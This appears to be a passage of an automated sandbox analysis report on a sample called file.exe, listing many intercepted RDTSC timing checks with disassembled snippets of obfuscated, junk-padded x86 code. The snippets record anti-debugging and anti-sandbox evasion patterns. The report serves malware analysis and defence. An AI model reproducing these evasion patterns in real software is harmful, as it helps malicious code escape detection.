Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4B0C0 second address: E4B0C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4A763 second address: E4A76C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4A76C second address: E4A781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 je 00007FDE70D000D4h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FDE70D000C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4B8F2 second address: E4B915 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDE71263CECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FDE71263CEEh 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4C5BB second address: E4C5C5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4C5C5 second address: E4C5CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D0C7 second address: E4D0CC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4CE2F second address: E4CE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4CE33 second address: E4CE37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4CE37 second address: E4CE3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4DC32 second address: E4DC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jbe 00007FDE70D000C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4DC44 second address: E4DC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4DC49 second address: E4DC7B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDE70D000C8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d sub dword ptr [ebp+1245AF8Dh], edx 0x00000013 push 00000000h 0x00000015 movzx edi, si 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+1245DBCDh], esi 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FDE70D000CFh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4DC7B second address: E4DC81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4DC81 second address: E4DC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E50DF2 second address: E50E04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E50E04 second address: E50E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE70D000CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E50E16 second address: E50E59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b cld 0x0000000c push 00000000h 0x0000000e mov ebx, 5044F717h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FDE71263CE8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov dword ptr [ebp+12453468h], ebx 0x00000035 mov dword ptr [ebp+122D1FB3h], ebx 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E50E59 second address: E50E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E53CC5 second address: E53CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E53CC9 second address: E53D35 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FDE70D000C8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov di, 6A5Ch 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007FDE70D000C8h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 mov edi, ecx 0x00000048 push 00000000h 0x0000004a and edi, 47D88BA4h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 push edx 0x00000057 pop edx 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E54C2C second address: E54C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c jnc 00007FDE71263CFFh 0x00000012 popad 0x00000013 nop 0x00000014 mov bl, 22h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007FDE71263CE8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 or dword ptr [ebp+122D2795h], eax 0x00000038 push 00000000h 0x0000003a mov di, bx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FDE71263CF2h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E56C8F second address: E56C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E56C95 second address: E56C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E56C99 second address: E56CCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FDE70D000D9h 0x00000014 jmp 00007FDE70D000D3h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E56CCD second address: E56D56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FDE71263CE8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D2BAFh] 0x0000002a mov ebx, esi 0x0000002c push 00000000h 0x0000002e mov bx, CD86h 0x00000032 xor edi, dword ptr [ebp+12459003h] 0x00000038 push 00000000h 0x0000003a jmp 00007FDE71263CEEh 0x0000003f xchg eax, esi 0x00000040 jne 00007FDE71263D02h 0x00000046 push eax 0x00000047 push ebx 0x00000048 pushad 0x00000049 jnp 00007FDE71263CE6h 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF0FB second address: DFF105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDE70D000C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF105 second address: DFF114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF114 second address: DFF130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007FDE70D000C6h 0x0000000d jmp 00007FDE70D000CCh 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF130 second address: DFF13B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007FDE71263CE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF13B second address: DFF157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FDE70D000CDh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF157 second address: DFF15D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5A7D5 second address: E5A7D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5A7D9 second address: E5A894 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDE71263CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDE71263CF0h 0x0000000f popad 0x00000010 push eax 0x00000011 push ecx 0x00000012 push edx 0x00000013 jnl 00007FDE71263CE6h 0x00000019 pop edx 0x0000001a pop ecx 0x0000001b nop 0x0000001c mov dword ptr [ebp+122D23D4h], ecx 0x00000022 jmp 00007FDE71263CF8h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FDE71263CE8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov ebx, 779F8287h 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007FDE71263CE8h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 00000018h 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 jmp 00007FDE71263CF3h 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007FDE71263CF3h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5B804 second address: E5B884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FDE70D000C8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov bx, dx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007FDE70D000C8h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 add ebx, dword ptr [ebp+122D1E57h] 0x0000004d mov di, bx 0x00000050 mov bx, 56F9h 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FDE70D000D1h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5AA0B second address: E5AA0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5B884 second address: E5B88A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5C7F7 second address: E5C867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FDE71263CE8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 call 00007FDE71263CEFh 0x00000029 mov ebx, dword ptr [ebp+124868CEh] 0x0000002f pop ebx 0x00000030 push 00000000h 0x00000032 jmp 00007FDE71263CEAh 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+122D204Bh], edi 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 jng 00007FDE71263CECh 0x00000047 jng 00007FDE71263CE6h 0x0000004d jns 00007FDE71263CE8h 0x00000053 popad 0x00000054 push eax 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 push edi 0x00000059 pop edi 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5E780 second address: E5E787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5B9DE second address: E5B9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5E787 second address: E5E7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FDE70D000C8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 call 00007FDE70D000D5h 0x00000027 mov ebx, dword ptr [ebp+122D2D0Fh] 0x0000002d pop edi 0x0000002e push 00000000h 0x00000030 clc 0x00000031 push 00000000h 0x00000033 xor edi, dword ptr [ebp+122D2B92h] 0x00000039 push eax 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FDE70D000D1h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5CAF8 second address: E5CAFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5B9E3 second address: E5B9E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5E7F0 second address: E5E7F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5B9E9 second address: E5B9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5DA41 second address: E5DA57 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDE71263CECh 0x00000008 jng 00007FDE71263CE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5B9ED second address: E5B9FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5DA57 second address: E5DA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5B9FB second address: E5B9FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5DB2B second address: E5DB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5DB2F second address: E5DB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5DB33 second address: E5DB3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFBBEA second address: DFBBF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E61E0B second address: E61E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E62D87 second address: E62D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDE70D000C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E62D92 second address: E62E37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007FDE71263CEEh 0x00000010 jnp 00007FDE71263CE8h 0x00000016 nop 0x00000017 jmp 00007FDE71263CF6h 0x0000001c push 00000000h 0x0000001e call 00007FDE71263CEAh 0x00000023 add ebx, 38527AF4h 0x00000029 pop ebx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007FDE71263CE8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 jmp 00007FDE71263CF1h 0x0000004b xchg eax, esi 0x0000004c pushad 0x0000004d jmp 00007FDE71263CF5h 0x00000052 push esi 0x00000053 push eax 0x00000054 pop eax 0x00000055 pop esi 0x00000056 popad 0x00000057 push eax 0x00000058 push ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b push edi 0x0000005c pop edi 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E62F60 second address: E63001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+122D2B88h], edx 0x0000000e call 00007FDE70D000D0h 0x00000013 mov edi, dword ptr [ebp+122D2C3Bh] 0x00000019 pop edi 0x0000001a push dword ptr fs:[00000000h] 0x00000021 pushad 0x00000022 popad 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a pushad 0x0000002b xor dword ptr [ebp+1247803Ah], edx 0x00000031 movzx eax, dx 0x00000034 popad 0x00000035 mov eax, dword ptr [ebp+122D0029h] 0x0000003b push 00000000h 0x0000003d push esi 0x0000003e call 00007FDE70D000C8h 0x00000043 pop esi 0x00000044 mov dword ptr [esp+04h], esi 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc esi 0x00000051 push esi 0x00000052 ret 0x00000053 pop esi 0x00000054 ret 0x00000055 sub ebx, 0168FF56h 0x0000005b sub dword ptr [ebp+122D1ED6h], ecx 0x00000061 push FFFFFFFFh 0x00000063 mov di, D2DBh 0x00000067 jmp 00007FDE70D000CCh 0x0000006c nop 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FDE70D000D7h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E66304 second address: E66308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E66308 second address: E6630C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E63ECA second address: E63EE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E09244 second address: E0925E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDE70D000CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6D85E second address: E6D862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6D862 second address: E6D868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E72671 second address: E7267B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7267B second address: E726AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FDE70D000D6h 0x00000013 jmp 00007FDE70D000CBh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E726AB second address: E726D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnl 00007FDE71263CEEh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7A7FF second address: E7A819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FDE70D000CAh 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FDE70D000C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7A819 second address: E7A827 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDE71263CE8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79482 second address: E79486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79486 second address: E79495 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEAh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79495 second address: E7949B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79A60 second address: E79A65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79D92 second address: E79DAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79DAC second address: E79DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FDE71263CECh 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79DC6 second address: E79DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
